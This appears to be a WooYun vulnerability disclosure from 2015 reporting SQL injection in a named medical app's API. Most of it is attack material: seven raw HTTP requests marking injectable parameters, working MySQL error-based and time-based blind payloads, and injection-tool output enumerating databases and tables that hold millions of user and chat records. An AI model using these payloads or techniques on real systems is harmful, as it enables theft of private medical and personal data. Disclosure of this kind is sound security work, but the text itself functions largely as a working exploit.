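2015-04-17: Details have been sent to the vendor; awaiting the vendor's handling.
2015-04-22: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.

User information for 3.12 million users and 21.22 million chat records. Insane! There is contract information too!!!

The gift pack is as follows: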
1.
POST /api/m.php?randnum=0.3436146208550781 HTTP/1.1
Content-Length: 307
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

action=chatend&chatid=(*)

2.
POST /api/m.php?randnum=0.404921563109383 HTTP/1.1
Content-Length: 355
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

action=login&password=(*)&username=(*)

3.
POST /api/m.php?randnum=0.07986594829708338 HTTP/1.1
Content-Length: 341
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

action=logout&userid=(*)

4.
POST /client/api.php?randnum=0.30327599309384823 HTTP/1.1
Content-Length: 418
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

action=chatnow&doctorid=(*)&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user

5.
POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1
Content-Length: 361
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

action=login&number=(*)&ver=1.3

6.
POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1
Content-Length: 359
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

action=login&number=e&password=(*)&ver=1.3

7.
http://medapp.ranknowcn.com/client/image.php?key=(*)
---
Parameter: key (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: key=' AND (SELECT 4808 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(4808=4808,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AYzU'='AYzU

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: key=' AND (SELECT * FROM (SELECT(SLEEP(5)))eThy) AND 'AyNZ'='AyNZ
---
web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL >= 5.0.0
current user is DBA: False
available databases [3]:
[*] information_schema
[*] lucky_draw
[*] medapp

Database: lucky_draw
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| quotaQuestionSearch_static    | 8409865 |
| quotaQuestionSearch_static2   | 1668219 |
| question_bak_20140826         | 984870  |
| chat_bak_20140826             | 914996  |
| answer_bak_20140826           | 913774  |
| `360search_sendurl_log`       | 209444  |
| hospitalSellLog_updLog_bak1   | 131155  |
| sellLog                       | 82301   | -----------------> logs
| sellLog_bak2                  | 82110   |
| sellLog_bak1                  | 74940   |
| searchHospital_keshi          | 67054   |
| hospitalSellLog_invalidChat   | 36319   |
| hetong                        | 3265    |
| searchHospital_hospital       | 2771    |

Database: medapp
+------------------------------+----------+
| Table                        | Entries  |
+------------------------------+----------+
| chathistory                  | 21220288 | ---------> 21.22 million chat records
| chatsourceLog                | 18372907 |
| userAddrdetail               | 15648638 |
| jihuo                        | 12418129 |
| iospush                      | 12005034 |
| userVisitLog                 | 9016552  |
| ios_xyz                      | 5330339  |
| record                       | 5000392  |
| ios_xyz2                     | 4968693  |
| ios_xyz2_copy2               | 4961188  |
| quotaQuestionSearch          | 4727017  |
| userDeviceid                 | 3822977  |
| logs_question                | 3231583  |
| `user`                       | 3126644  | ---------------> 3.12 million users
| question                     | 2665491  |
| question_all                 | 2571617  |
| chat                         | 2487796  |
| answer                       | 2485376  |
| logs_doctorlogin             | 2243382  |
| ios_xyz2_copy                | 1313491  |
| addrdetailLog                | 1159968  |
| questionCountForDate         | 734583   |
| logs_users                   | 656968   |
| temp_questions               | 617653   |
| jihuo_macaddr                | 590965   |
| hospitalSellLog_updLog       | 558268   |
| gps_raw_data                 | 499429   |
| gps_cell                     | 365384   |
| gps_wifi                     | 342661   |
| iptable                      | 300132   |
| userAlias                    | 262960   |
| bj_base_station              | 250502   |
| chatcomment                  | 236696   |
| chatclose                    | 224087   |
| chatchange                   | 161348   |
| chatUpdLog                   | 142630   |
| meiapp_mm_vote               | 122459   |
| gps_pos                      | 117181   |
| quotaQuestion_test           | 113152   |
| question_repeatLog           | 105996   |
| uploadFile                   | 89077    |
| ios_xyz2_copy1               | 88297    |
| quotaQuestion                | 86733    |
| publicQuestion               | 82896    |
| userLeaveWords               | 71036    |
| jihuoCountForDate            | 69885    |
| cityhospital_keshi           | 67054    |
| user_copy                    | 45704    |
| iospushmsg                   | 43265    |
| booking                      | 39305    |
| logs_hospital                | 34670    |
| meiapp_news                  | 30347    |

There is some other sensitive information that I will not post here.
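Insane, fix this urgently! Asking for 20 rank!!!

Severity: no impact, ignored by vendor
Ignored at: 2015-04-22 18:42
Vulnerability Rank: 15 (WooYun rating)

2015-04-22: Many thanks. Because so many vulnerabilities have been posted recently, this one was missed, and the confirmation is a bit late.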